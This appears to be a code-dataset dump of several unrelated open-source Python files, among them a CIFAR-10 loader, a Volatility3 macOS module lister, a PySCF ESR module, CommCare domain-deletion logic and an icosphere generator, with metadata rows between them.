cifar_label_names = meta_data_dict[b'label_names']
cifar_label_names = np.array(cifar_label_names)
# training data
cifar_train_data = None
cifar_train_filenames = []
cifar_train_labels = []
# cifar_train_data_dict
# 'batch_label': 'training batch 5 of 5'
# 'data': ndarray
# 'filenames': list
# 'labels': list
for i in range(1, 6):
cifar_train_data_dict = unpickle(data_dir + "/data_batch_{}".format(i))
if i == 1:
cifar_train_data = cifar_train_data_dict[b'data']
else:
cifar_train_data = np.vstack((cifar_train_data, cifar_train_data_dict[b'data']))
cifar_train_filenames += cifar_train_data_dict[b'filenames']
cifar_train_labels += cifar_train_data_dict[b'labels']
cifar_train_data = cifar_train_data.reshape((len(cifar_train_data), 3, 32, 32))
if negatives:
cifar_train_data = cifar_train_data.transpose(0, 2, 3, 1).astype(np.float32)
else:
cifar_train_data = np.rollaxis(cifar_train_data, 1, 4)
cifar_train_filenames = np.array(cifar_train_filenames)
cifar_train_labels = np.array(cifar_train_labels)
# test data
# cifar_test_data_dict
# 'batch_label': 'testing batch 1 of 1'
# 'data': ndarray
# 'filenames': list
# 'labels': list
cifar_test_data_dict = unpickle(data_dir + "/test_batch")
cifar_test_data = cifar_test_data_dict[b'data']
cifar_test_filenames = cifar_test_data_dict[b'filenames']
cifar_test_labels = cifar_test_data_dict[b'labels']
cifar_test_data = cifar_test_data.reshape((len(cifar_test_data), 3, 32, 32))
if negatives:
cifar_test_data = cifar_test_data.transpose(0, 2, 3, 1).astype(np.float32)
else:
cifar_test_data = np.rollaxis(cifar_test_data, 1, 4)
cifar_test_filenames = np.array(cifar_test_filenames)
cifar_test_labels = np.array(cifar_test_labels)
return cifar_train_data, cifar_train_filenames, cifar_train_labels, \
cifar_test_data, cifar_test_filenames, cifar_test_labels, cifar_label_names
if __name__ == "__main__":
"""show it works"""
cifar_10_dir = './cifar10-dataset'  # forward slash avoids an invalid escape sequence warning
train_data, train_filenames, train_labels, test_data, test_filenames, test_labels, label_names = \
load_cifar_10_data(cifar_10_dir)
print("Train data: ", train_data.shape)
print("Train filenames: ", train_filenames.shape)
print("Train labels: ", train_labels.shape)
print("Test data: ", test_data.shape)
print("Test filenames: ", test_filenames.shape)
print("Test labels: ", test_labels.shape)
print("Label names: ", label_names.shape)
# Don't forget that the label_names and filesnames are in binary and need conversion if used.
# display some random training images in a 25x25 grid
num_plot = 5
f, ax = plt.subplots(num_plot, num_plot)
for m in range(num_plot):
for n in range(num_plot):
idx = np.random.randint(0, train_data.shape[0])
ax[m, n].imshow(train_data[idx])
ax[m, n].get_xaxis().set_visible(False)
ax[m, n].get_yaxis().set_visible(False)
f.subplots_adjust(hspace=0.1)
f.subplots_adjust(wspace=0)
plt.show()
| 36.808333
| 118
| 0.699796
| 645
| 4,417
| 4.494574
| 0.244961
| 0.096585
| 0.086927
| 0.037254
| 0.361159
| 0.298034
| 0.162815
| 0.12832
| 0.098655
| 0.073129
| 0
| 0.029047
| 0.197193
| 4,417
| 119
| 119
| 37.117647
| 0.788494
| 0.150781
| 0
| 0.078125
| 0
| 0
| 0.070058
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03125
| false
| 0
| 0.046875
| 0
| 0.109375
| 0.109375
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe5d25adf1fa45402acfda5811c79b3110e5df76
| 3,054
|
py
|
Python
|
volatility3/framework/plugins/mac/lsmod.py
|
leohearts/volatility3
|
f52bd8d74fc47e63ea2611d0171b63dc589d4fdf
|
[
"Linux-OpenIB"
] | null | null | null |
volatility3/framework/plugins/mac/lsmod.py
|
leohearts/volatility3
|
f52bd8d74fc47e63ea2611d0171b63dc589d4fdf
|
[
"Linux-OpenIB"
] | null | null | null |
volatility3/framework/plugins/mac/lsmod.py
|
leohearts/volatility3
|
f52bd8d74fc47e63ea2611d0171b63dc589d4fdf
|
[
"Linux-OpenIB"
] | null | null | null |
# This file is Copyright 2019 Volatility Foundation and licensed under the Volatility Software License 1.0
# which is available at https://www.volatilityfoundation.org/license/vsl-v1.0
#
"""A module containing a collection of plugins that produce data typically
found in Mac's lsmod command."""
from volatility3.framework import exceptions, renderers, interfaces, contexts  # 'exceptions' is required for InvalidAddressException below
from volatility3.framework.configuration import requirements
from volatility3.framework.interfaces import plugins
from volatility3.framework.objects import utility
from volatility3.framework.renderers import format_hints
class Lsmod(plugins.PluginInterface):
"""Lists loaded kernel modules."""
_required_framework_version = (1, 0, 0)
_version = (1, 0, 0)
@classmethod
def get_requirements(cls):
return [
requirements.TranslationLayerRequirement(name = 'primary',
description = 'Memory layer for the kernel',
architectures = ["Intel32", "Intel64"]),
requirements.SymbolTableRequirement(name = "darwin", description = "Mac kernel")
]
@classmethod
def list_modules(cls, context: interfaces.context.ContextInterface, layer_name: str, darwin_symbols: str):
"""Lists all the modules in the primary layer.
Args:
context: The context to retrieve required elements (layers, symbol tables) from
layer_name: The name of the layer on which to operate
darwin_symbols: The name of the table containing the kernel symbols
Returns:
A list of modules from the `layer_name` layer
"""
kernel = contexts.Module(context, darwin_symbols, layer_name, 0)
kernel_layer = context.layers[layer_name]
kmod_ptr = kernel.object_from_symbol(symbol_name = "kmod")
try:
kmod = kmod_ptr.dereference().cast("kmod_info")
except exceptions.InvalidAddressException:
return []
yield kmod
try:
kmod = kmod.next
except exceptions.InvalidAddressException:
return []
seen = set()
while kmod != 0 and \
kmod not in seen and \
len(seen) < 1024:
kmod_obj = kmod.dereference()
if not kernel_layer.is_valid(kmod_obj.vol.offset, kmod_obj.vol.size):
break
seen.add(kmod)
yield kmod
try:
kmod = kmod.next
except exceptions.InvalidAddressException:
return
def _generator(self):
for module in self.list_modules(self.context, self.config['primary'], self.config['darwin']):
mod_name = utility.array_to_string(module.name)
mod_size = module.size
yield 0, (format_hints.Hex(module.vol.offset), mod_name, mod_size)
def run(self):
return renderers.TreeGrid([("Offset", format_hints.Hex), ("Name", str), ("Size", int)], self._generator())
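The heart of list_modules above is a defensive walk of the kernel's kmod singly linked list: a seen set breaks pointer cycles, the walk is capped at 1024 entries, and it stops at the first unreadable or invalid address. A minimal, framework-free sketch of that traversal pattern (the Node class and names below are illustrative, not the real kmod_info layout):

def walk_linked_list(head, get_next, max_nodes=1024):
    """Yield nodes from a singly linked list, guarding against cycles and runaway lists."""
    seen = set()
    node = head
    while node is not None and id(node) not in seen and len(seen) < max_nodes:
        seen.add(id(node))
        yield node
        try:
            node = get_next(node)   # may raise if the next pointer cannot be read
        except Exception:
            return

class Node:
    def __init__(self, name, next=None):
        self.name, self.next = name, next

tail = Node("module_b")
head = Node("module_a", tail)
tail.next = head                     # deliberately create a cycle
print([n.name for n in walk_linked_list(head, lambda n: n.next)])   # ['module_a', 'module_b']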
| 34.704545
| 114
| 0.630321
| 337
| 3,054
| 5.599407
| 0.388724
| 0.039746
| 0.063593
| 0.023847
| 0.073132
| 0.073132
| 0.073132
| 0.073132
| 0.073132
| 0.073132
| 0
| 0.013755
| 0.285855
| 3,054
| 87
| 115
| 35.103448
| 0.851444
| 0.208579
| 0
| 0.28
| 0
| 0
| 0.044406
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08
| false
| 0
| 0.1
| 0.04
| 0.34
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe5f1c04bf52b3ba6d57139fe21bba52f39a4f4c
| 6,901
|
py
|
Python
|
pyscf/prop/esr/uks.py
|
azag0/pyscf
|
1e3e27b61b3cfd22c9679d2c9851c13b3ebc5a1b
|
[
"Apache-2.0"
] | 2
|
2021-08-03T12:32:25.000Z
|
2021-09-29T08:19:02.000Z
|
pyscf/prop/esr/uks.py
|
azag0/pyscf
|
1e3e27b61b3cfd22c9679d2c9851c13b3ebc5a1b
|
[
"Apache-2.0"
] | null | null | null |
pyscf/prop/esr/uks.py
|
azag0/pyscf
|
1e3e27b61b3cfd22c9679d2c9851c13b3ebc5a1b
|
[
"Apache-2.0"
] | 2
|
2020-06-01T05:31:38.000Z
|
2022-02-08T02:38:33.000Z
|
#!/usr/bin/env python
# Copyright 2014-2019 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Qiming Sun <osirpt.sun@gmail.com>
#
'''
Non-relativistic unrestricted Kohn-Sham electron spin-rotation coupling
(In testing)
Refs:
J. Phys. Chem. A. 114, 9246, 2010
Mole. Phys. 9, 6, 585, 1964
'''
from functools import reduce
import numpy, sys
from pyscf import lib
from pyscf.lib import logger
from pyscf.dft import numint
from pyscf.prop.nmr import uks as uks_nmr
from pyscf.prop.esr import uhf as uhf_esr
from pyscf.prop.esr.uhf import _write, align
from pyscf.data import nist
from pyscf.grad import rks as rks_grad
# Note mo10 is the imaginary part of MO^1
def para(obj, mo10, mo_coeff, mo_occ, qed_fac=1):
mol = obj.mol
effspin = mol.spin * .5
muB = .5 # Bohr magneton
#qed_fac = (nist.G_ELECTRON - 1)
orboa = mo_coeff[0][:,mo_occ[0]>0]
orbob = mo_coeff[1][:,mo_occ[1]>0]
dm0a = numpy.dot(orboa, orboa.T)
dm0b = numpy.dot(orbob, orbob.T)
dm10a = [reduce(numpy.dot, (mo_coeff[0], x, orboa.T)) for x in mo10[0]]
dm10b = [reduce(numpy.dot, (mo_coeff[1], x, orbob.T)) for x in mo10[1]]
dm10a = numpy.asarray([x-x.T for x in dm10a])
dm10b = numpy.asarray([x-x.T for x in dm10b])
hso1e = uhf_esr.make_h01_soc1e(obj, mo_coeff, mo_occ, qed_fac)
para1e =-numpy.einsum('xji,yij->xy', dm10a, hso1e)
para1e+= numpy.einsum('xji,yij->xy', dm10b, hso1e)
para1e *= 1./effspin / muB
#_write(obj, align(para1e)[0], 'SOC(1e)/OZ')
if obj.para_soc2e:
raise NotImplementedError('para_soc2e = %s' % obj.para_soc2e)
para = para1e
return para
# Treat Vxc as one-particle operator Vnuc
def get_vxc_soc(ni, mol, grids, xc_code, dms, max_memory=2000, verbose=None):
xctype = ni._xc_type(xc_code)
make_rho, nset, nao = ni._gen_rho_evaluator(mol, dms, hermi=1)
ngrids = len(grids.weights)
BLKSIZE = numint.BLKSIZE
blksize = min(int(max_memory/12*1e6/8/nao/BLKSIZE)*BLKSIZE, ngrids)
shls_slice = (0, mol.nbas)
ao_loc = mol.ao_loc_nr()
vmat = numpy.zeros((2,3,nao,nao))
if xctype == 'LDA':
buf = numpy.empty((4,blksize,nao))
ao_deriv = 1
for ao, mask, weight, coords \
in ni.block_loop(mol, grids, nao, ao_deriv, max_memory,
blksize=blksize, buf=buf):
rho_a = make_rho(0, ao[0], mask, 'LDA')
rho_b = make_rho(1, ao[0], mask, 'LDA')
vxc = ni.eval_xc(xc_code, (rho_a, rho_b), 1, deriv=1)[1]
vrho = vxc[0]
aow = numpy.einsum('xpi,p->xpi', ao[1:], weight*vrho[:,0])
_cross3x3_(vmat[0], mol, aow, ao[1:], mask, shls_slice, ao_loc)
aow = numpy.einsum('xpi,p->xpi', ao[1:], weight*vrho[:,1])
_cross3x3_(vmat[1], mol, aow, ao[1:], mask, shls_slice, ao_loc)
rho = vxc = vrho = aow = None
elif xctype == 'GGA':
buf = numpy.empty((10,blksize,nao))
ao_deriv = 2
for ao, mask, weight, coords \
in ni.block_loop(mol, grids, nao, ao_deriv, max_memory,
blksize=blksize, buf=buf):
rho_a = make_rho(0, ao, mask, 'GGA')
rho_b = make_rho(1, ao, mask, 'GGA')
vxc = ni.eval_xc(xc_code, (rho_a,rho_b), 1, deriv=1)[1]
wva, wvb = numint._uks_gga_wv0((rho_a, rho_b), vxc, weight)
ip_ao = ao[1:4]
ipip_ao = ao[4:]
aow = rks_grad._make_dR_dao_w(ao, wva)
_cross3x3_(vmat[0], mol, aow, ip_ao, mask, shls_slice, ao_loc)
aow = rks_grad._make_dR_dao_w(ao, wvb)
_cross3x3_(vmat[1], mol, aow, ip_ao, mask, shls_slice, ao_loc)
rho = vxc = vrho = vsigma = wv = aow = None
vmat = vmat - vmat.transpose(0,1,3,2)
else:
raise NotImplementedError('meta-GGA')
return vmat
def _cross3x3_(out, mol, ao1, ao2, mask, shls_slice, ao_loc):
out[0] += numint._dot_ao_ao(mol, ao1[1], ao2[2], mask, shls_slice, ao_loc)
out[0] -= numint._dot_ao_ao(mol, ao1[2], ao2[1], mask, shls_slice, ao_loc)
out[1] += numint._dot_ao_ao(mol, ao1[2], ao2[0], mask, shls_slice, ao_loc)
out[1] -= numint._dot_ao_ao(mol, ao1[0], ao2[2], mask, shls_slice, ao_loc)
out[2] += numint._dot_ao_ao(mol, ao1[0], ao2[1], mask, shls_slice, ao_loc)
out[2] -= numint._dot_ao_ao(mol, ao1[1], ao2[0], mask, shls_slice, ao_loc)
return out
# Jia, start to work here
class ESR(uhf_esr.ESR):
'''dE = B dot gtensor dot s'''
def __init__(self, scf_method):
uhf_esr.ESR.__init__(self, scf_method)
self.dia_soc2e = False
self.para_soc2e = False
def para(self, mo10=None, mo_coeff=None, mo_occ=None):
if mo_coeff is None: mo_coeff = self._scf.mo_coeff
if mo_occ is None: mo_occ = self._scf.mo_occ
if mo10 is None:
self.mo10, self.mo_e10 = self.solve_mo1()
mo10 = self.mo10
return para(self, mo10, mo_coeff, mo_occ)
#make_para_soc2e = make_para_soc2e
get_fock = uks_nmr.get_fock
if __name__ == '__main__':
from pyscf import gto, scf
mol = gto.M(atom='H 0 0.1 0; H 0 0 1.',
basis='ccpvdz', spin=1, charge=-1, verbose=3)
mf = scf.UKS(mol).set(xc='bp86').run()
esr_obj = ESR(mf)
esr_obj.gauge_orig = (0,0,0)
esr_obj.para_soc2e = False
esr_obj.so_eff_charge = True
print(esr_obj.kernel())
mol = gto.M(atom='''
H 0 0 1
H 1.2 0 1
H .1 1.1 0.3
H .8 .7 .6
''',
basis='ccpvdz', spin=1, charge=1, verbose=3)
mf = scf.UKS(mol).set(xc='bp86').run()
gobj = GTensor(mf)
#print(gobj.kernel())
gobj.para_soc2e = 'SSO'
gobj.dia_soc2e = None
gobj.so_eff_charge = False
nao, nmo = mf.mo_coeff[0].shape
nelec = mol.nelec
numpy.random.seed(1)
mo10 =[numpy.random.random((3,nmo,nelec[0])),
numpy.random.random((3,nmo,nelec[1]))]
print(lib.finger(para(gobj, mo10, mf.mo_coeff, mf.mo_occ)) - -2.1813250579863279e-05)
numpy.random.seed(1)
dm0 = numpy.random.random((2,nao,nao))
dm0 = dm0 + dm0.transpose(0,2,1)
dm10 = numpy.random.random((2,3,nao,nao))
dm10 = dm10 - dm10.transpose(0,1,3,2)
print(lib.finger(make_para_soc2e(gobj, dm0, dm10)) - 0.0036073897889263721)
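The paramagnetic one-electron term above is assembled with numpy.einsum('xji,yij->xy', dm10, hso1e); entry (x, y) of the result is the trace of dm10[x] @ hso1e[y]. A small standalone numpy check of that equivalence, with random arrays of assumed shape (3 field components, each nao x nao):

import numpy as np

nao = 4
dm10 = np.random.rand(3, nao, nao)
hso1e = np.random.rand(3, nao, nao)

para = np.einsum('xji,yij->xy', dm10, hso1e)

# Same 3x3 matrix built explicitly from traces
ref = np.array([[np.trace(dm10[x] @ hso1e[y]) for y in range(3)] for x in range(3)])
assert np.allclose(para, ref)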
| 36.707447
| 89
| 0.613534
| 1,128
| 6,901
| 3.580674
| 0.263298
| 0.02253
| 0.035405
| 0.040852
| 0.321862
| 0.281753
| 0.240654
| 0.235702
| 0.195098
| 0.167863
| 0
| 0.060419
| 0.246921
| 6,901
| 187
| 90
| 36.903743
| 0.71676
| 0.156354
| 0
| 0.092308
| 0
| 0
| 0.045643
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0
| 0.084615
| 0
| 0.169231
| 0.023077
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe605cdea9d8787846418bf36b3fc74d17111206
| 11,661
|
py
|
Python
|
corehq/apps/domain/deletion.py
|
shyamkumarlchauhan/commcare-hq
|
99df931bcf56e9fbe15d8fcb0dc98b5a3957fb48
|
[
"BSD-3-Clause"
] | null | null | null |
corehq/apps/domain/deletion.py
|
shyamkumarlchauhan/commcare-hq
|
99df931bcf56e9fbe15d8fcb0dc98b5a3957fb48
|
[
"BSD-3-Clause"
] | null | null | null |
corehq/apps/domain/deletion.py
|
shyamkumarlchauhan/commcare-hq
|
99df931bcf56e9fbe15d8fcb0dc98b5a3957fb48
|
[
"BSD-3-Clause"
] | null | null | null |
import itertools
import logging
from datetime import date
from django.apps import apps
from django.conf import settings
from django.db import connection, transaction
from django.db.models import Q
from dimagi.utils.chunked import chunked
from corehq.apps.accounting.models import Subscription
from corehq.apps.accounting.utils import get_change_status
from corehq.apps.custom_data_fields.dbaccessors import get_by_domain_and_type
from corehq.apps.domain.utils import silence_during_tests
from corehq.apps.locations.views import LocationFieldsView
from corehq.apps.products.views import ProductFieldsView
from corehq.apps.userreports.dbaccessors import (
delete_all_ucr_tables_for_domain,
)
from corehq.apps.users.views.mobile import UserFieldsView
from corehq.blobs import CODES, get_blob_db
from corehq.blobs.models import BlobMeta
from corehq.form_processor.backends.sql.dbaccessors import doc_type_to_state
from corehq.form_processor.interfaces.dbaccessors import (
CaseAccessors,
FormAccessors,
)
from corehq.util.log import with_progress_bar
logger = logging.getLogger(__name__)
class BaseDeletion(object):
def __init__(self, app_label):
self.app_label = app_label
def is_app_installed(self):
try:
return bool(apps.get_app_config(self.app_label))
except LookupError:
return False
class CustomDeletion(BaseDeletion):
def __init__(self, app_label, deletion_fn):
super(CustomDeletion, self).__init__(app_label)
self.deletion_fn = deletion_fn
def execute(self, domain_name):
if self.is_app_installed():
self.deletion_fn(domain_name)
class RawDeletion(BaseDeletion):
def __init__(self, app_label, raw_query):
super(RawDeletion, self).__init__(app_label)
self.raw_query = raw_query
def execute(self, cursor, domain_name):
if self.is_app_installed():
cursor.execute(self.raw_query, [domain_name])
class ModelDeletion(BaseDeletion):
def __init__(self, app_label, model_name, domain_filter_kwarg):
super(ModelDeletion, self).__init__(app_label)
self.domain_filter_kwarg = domain_filter_kwarg
self.model_name = model_name
def get_model_class(self):
return apps.get_model(self.app_label, self.model_name)
def execute(self, domain_name):
if not domain_name:
# The Django orm will properly turn a None domain_name to a
# IS NULL filter. We don't want to allow deleting records for
# NULL domain names since they might have special meaning (like
# in some of the SMS models).
raise RuntimeError("Expected a valid domain name")
if self.is_app_installed():
model = self.get_model_class()
model.objects.filter(**{self.domain_filter_kwarg: domain_name}).delete()
def _delete_domain_backend_mappings(domain_name):
model = apps.get_model('sms', 'SQLMobileBackendMapping')
model.objects.filter(is_global=False, domain=domain_name).delete()
def _delete_domain_backends(domain_name):
model = apps.get_model('sms', 'SQLMobileBackend')
model.objects.filter(is_global=False, domain=domain_name).delete()
def _delete_web_user_membership(domain_name):
from corehq.apps.users.models import WebUser
active_web_users = WebUser.by_domain(domain_name)
inactive_web_users = WebUser.by_domain(domain_name, is_active=False)
for web_user in list(active_web_users) + list(inactive_web_users):
web_user.delete_domain_membership(domain_name)
if settings.UNIT_TESTING and not web_user.domain_memberships:
web_user.delete()
else:
web_user.save()
def _terminate_subscriptions(domain_name):
today = date.today()
with transaction.atomic():
current_subscription = Subscription.get_active_subscription_by_domain(domain_name)
if current_subscription:
current_subscription.date_end = today
current_subscription.is_active = False
current_subscription.save()
current_subscription.transfer_credits()
_, downgraded_privs, upgraded_privs = get_change_status(current_subscription.plan_version, None)
current_subscription.subscriber.deactivate_subscription(
downgraded_privileges=downgraded_privs,
upgraded_privileges=upgraded_privs,
old_subscription=current_subscription,
new_subscription=None,
)
Subscription.visible_objects.filter(
Q(date_start__gt=today) | Q(date_start=today, is_active=False),
subscriber__domain=domain_name,
).update(is_hidden_to_ops=True)
def _delete_all_cases(domain_name):
logger.info('Deleting cases...')
case_accessor = CaseAccessors(domain_name)
case_ids = case_accessor.get_case_ids_in_domain()
for case_id_chunk in chunked(with_progress_bar(case_ids, stream=silence_during_tests()), 500):
case_accessor.soft_delete_cases(list(case_id_chunk))
logger.info('Deleting cases complete.')
def _delete_all_forms(domain_name):
logger.info('Deleting forms...')
form_accessor = FormAccessors(domain_name)
form_ids = list(itertools.chain(*[
form_accessor.get_all_form_ids_in_domain(doc_type=doc_type)
for doc_type in doc_type_to_state
]))
for form_id_chunk in chunked(with_progress_bar(form_ids, stream=silence_during_tests()), 500):
form_accessor.soft_delete_forms(list(form_id_chunk))
logger.info('Deleting forms complete.')
def _delete_data_files(domain_name):
get_blob_db().bulk_delete(metas=list(BlobMeta.objects.partitioned_query(domain_name).filter(
parent_id=domain_name,
type_code=CODES.data_file,
)))
def _delete_custom_data_fields(domain_name):
# The CustomDataFieldsDefinition instances are cleaned up as part of the
# bulk couch delete, but we also need to clear the cache
logger.info('Deleting custom data fields...')
for field_view in [LocationFieldsView, ProductFieldsView, UserFieldsView]:
get_by_domain_and_type.clear(domain_name, field_view.field_type)
logger.info('Deleting custom data fields complete.')
# We use raw queries instead of ORM because Django queryset delete needs to
# fetch objects into memory to send signals and handle cascades. It makes deletion very slow
# if we have a millions of rows in stock data tables.
DOMAIN_DELETE_OPERATIONS = [
RawDeletion('stock', """
DELETE FROM stock_stocktransaction
WHERE report_id IN (SELECT id FROM stock_stockreport WHERE domain=%s)
"""),
RawDeletion('stock', "DELETE FROM stock_stockreport WHERE domain=%s"),
RawDeletion('stock', """
DELETE FROM commtrack_stockstate
WHERE product_id IN (SELECT product_id FROM products_sqlproduct WHERE domain=%s)
"""),
ModelDeletion('products', 'SQLProduct', 'domain'),
ModelDeletion('locations', 'SQLLocation', 'domain'),
ModelDeletion('locations', 'LocationType', 'domain'),
ModelDeletion('stock', 'DocDomainMapping', 'domain_name'),
ModelDeletion('domain_migration_flags', 'DomainMigrationProgress', 'domain'),
ModelDeletion('sms', 'DailyOutboundSMSLimitReached', 'domain'),
ModelDeletion('sms', 'SMS', 'domain'),
ModelDeletion('sms', 'SQLLastReadMessage', 'domain'),
ModelDeletion('sms', 'ExpectedCallback', 'domain'),
ModelDeletion('ivr', 'Call', 'domain'),
ModelDeletion('sms', 'Keyword', 'domain'),
ModelDeletion('sms', 'PhoneNumber', 'domain'),
ModelDeletion('sms', 'MessagingSubEvent', 'parent__domain'),
ModelDeletion('sms', 'MessagingEvent', 'domain'),
ModelDeletion('sms', 'QueuedSMS', 'domain'),
ModelDeletion('sms', 'SelfRegistrationInvitation', 'domain'),
CustomDeletion('sms', _delete_domain_backend_mappings),
ModelDeletion('sms', 'MobileBackendInvitation', 'domain'),
CustomDeletion('sms', _delete_domain_backends),
CustomDeletion('users', _delete_web_user_membership),
CustomDeletion('accounting', _terminate_subscriptions),
CustomDeletion('form_processor', _delete_all_cases),
CustomDeletion('form_processor', _delete_all_forms),
ModelDeletion('aggregate_ucrs', 'AggregateTableDefinition', 'domain'),
ModelDeletion('app_manager', 'AppReleaseByLocation', 'domain'),
ModelDeletion('app_manager', 'LatestEnabledBuildProfiles', 'domain'),
ModelDeletion('app_manager', 'ResourceOverride', 'domain'),
ModelDeletion('app_manager', 'GlobalAppConfig', 'domain'),
ModelDeletion('case_importer', 'CaseUploadRecord', 'domain'),
ModelDeletion('case_search', 'CaseSearchConfig', 'domain'),
ModelDeletion('case_search', 'CaseSearchQueryAddition', 'domain'),
ModelDeletion('case_search', 'FuzzyProperties', 'domain'),
ModelDeletion('case_search', 'IgnorePatterns', 'domain'),
ModelDeletion('cloudcare', 'ApplicationAccess', 'domain'),
ModelDeletion('consumption', 'DefaultConsumption', 'domain'),
ModelDeletion('data_analytics', 'GIRRow', 'domain_name'),
ModelDeletion('data_analytics', 'MALTRow', 'domain_name'),
ModelDeletion('data_dictionary', 'CaseType', 'domain'),
ModelDeletion('data_interfaces', 'CaseRuleAction', 'rule__domain'),
ModelDeletion('data_interfaces', 'CaseRuleCriteria', 'rule__domain'),
ModelDeletion('data_interfaces', 'CaseRuleSubmission', 'rule__domain'),
ModelDeletion('data_interfaces', 'CaseRuleSubmission', 'domain'), # TODO
ModelDeletion('data_interfaces', 'AutomaticUpdateRule', 'domain'),
ModelDeletion('data_interfaces', 'DomainCaseRuleRun', 'domain'),
ModelDeletion('domain', 'TransferDomainRequest', 'domain'),
ModelDeletion('export', 'EmailExportWhenDoneRequest', 'domain'),
CustomDeletion('export', _delete_data_files),
ModelDeletion('locations', 'LocationFixtureConfiguration', 'domain'),
ModelDeletion('ota', 'MobileRecoveryMeasure', 'domain'),
ModelDeletion('ota', 'SerialIdBucket', 'domain'),
ModelDeletion('phone', 'OwnershipCleanlinessFlag', 'domain'),
ModelDeletion('phone', 'SyncLogSQL', 'domain'),
ModelDeletion('registration', 'RegistrationRequest', 'domain'),
ModelDeletion('reminders', 'EmailUsage', 'domain'),
ModelDeletion('reports', 'ReportsSidebarOrdering', 'domain'),
ModelDeletion('smsforms', 'SQLXFormsSession', 'domain'),
ModelDeletion('translations', 'SMSTranslations', 'domain'),
ModelDeletion('translations', 'TransifexBlacklist', 'domain'),
ModelDeletion('userreports', 'AsyncIndicator', 'domain'),
ModelDeletion('users', 'DomainRequest', 'domain'),
ModelDeletion('users', 'Invitation', 'domain'),
ModelDeletion('users', 'DomainPermissionsMirror', 'source'),
ModelDeletion('zapier', 'ZapierSubscription', 'domain'),
ModelDeletion('dhis2', 'Dhis2Connection', 'domain'),
ModelDeletion('motech', 'RequestLog', 'domain'),
ModelDeletion('couchforms', 'UnfinishedSubmissionStub', 'domain'),
CustomDeletion('custom_data_fields', _delete_custom_data_fields),
CustomDeletion('ucr', delete_all_ucr_tables_for_domain),
]
def apply_deletion_operations(domain_name):
raw_ops, model_ops = _split_ops_by_type(DOMAIN_DELETE_OPERATIONS)
with connection.cursor() as cursor:
for op in raw_ops:
op.execute(cursor, domain_name)
for op in model_ops:
op.execute(domain_name)
def _split_ops_by_type(ops):
raw_ops = []
model_ops = []
for op in ops:
if isinstance(op, RawDeletion):
raw_ops.append(op)
else:
model_ops.append(op)
return raw_ops, model_ops
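apply_deletion_operations above depends on _split_ops_by_type running every raw SQL deletion on one cursor before any ORM-based deletion, while keeping the relative order inside each group. A small framework-free sketch of that partition-by-type pattern (the stub classes are illustrative, not the real CommCare HQ ones):

class RawDeletion:
    def __init__(self, label): self.label = label

class ModelDeletion:
    def __init__(self, label): self.label = label

def split_ops_by_type(ops):
    raw_ops, model_ops = [], []
    for op in ops:
        (raw_ops if isinstance(op, RawDeletion) else model_ops).append(op)
    return raw_ops, model_ops

ops = [RawDeletion('stock'), ModelDeletion('sms'), RawDeletion('stock2'), ModelDeletion('users')]
raw, models = split_ops_by_type(ops)
print([o.label for o in raw])      # ['stock', 'stock2']  (relative order preserved)
print([o.label for o in models])   # ['sms', 'users']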
| 41.646429
| 108
| 0.725924
| 1,290
| 11,661
| 6.266667
| 0.256589
| 0.117516
| 0.027214
| 0.020411
| 0.17949
| 0.120732
| 0.063582
| 0.029193
| 0.029193
| 0.029193
| 0
| 0.000821
| 0.164051
| 11,661
| 279
| 109
| 41.795699
| 0.828478
| 0.047595
| 0
| 0.059091
| 0
| 0
| 0.223795
| 0.038666
| 0
| 0
| 0
| 0.003584
| 0
| 1
| 0.086364
| false
| 0
| 0.104545
| 0.004545
| 0.227273
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe609a5c6fba0b3499c6abf7b2ebbe251d3d8901
| 8,056
|
py
|
Python
|
icosphere/icosphere.py
|
JackWalpole/icosahedron
|
5317d8eb9509abe275beb2693730e3efaa986672
|
[
"MIT"
] | 2
|
2017-10-02T23:36:49.000Z
|
2021-12-21T06:12:16.000Z
|
icosphere/icosphere.py
|
JackWalpole/icosphere
|
5317d8eb9509abe275beb2693730e3efaa986672
|
[
"MIT"
] | null | null | null |
icosphere/icosphere.py
|
JackWalpole/icosphere
|
5317d8eb9509abe275beb2693730e3efaa986672
|
[
"MIT"
] | null | null | null |
"""Subdivided icosahedral mesh generation"""
from __future__ import print_function
import numpy as np
# following: http://blog.andreaskahler.com/2009/06/creating-icosphere-mesh-in-code.html
# hierarchy:
# Icosphere -> Triangle -> Point
class IcoSphere:
"""
Usage: IcoSphere(level)
Maximum supported level = 8
get started with:
>>> A = IcoSphere(3)
... A.plot3d()
"""
# maximum level for subdivision of the icosahedron
maxlevel = 8
def __init__(self, level):
if type(level) is not int:
raise TypeError('level must be an integer')
elif level < 0:
raise Exception('level must be no less than 0')
elif level > self.maxlevel:
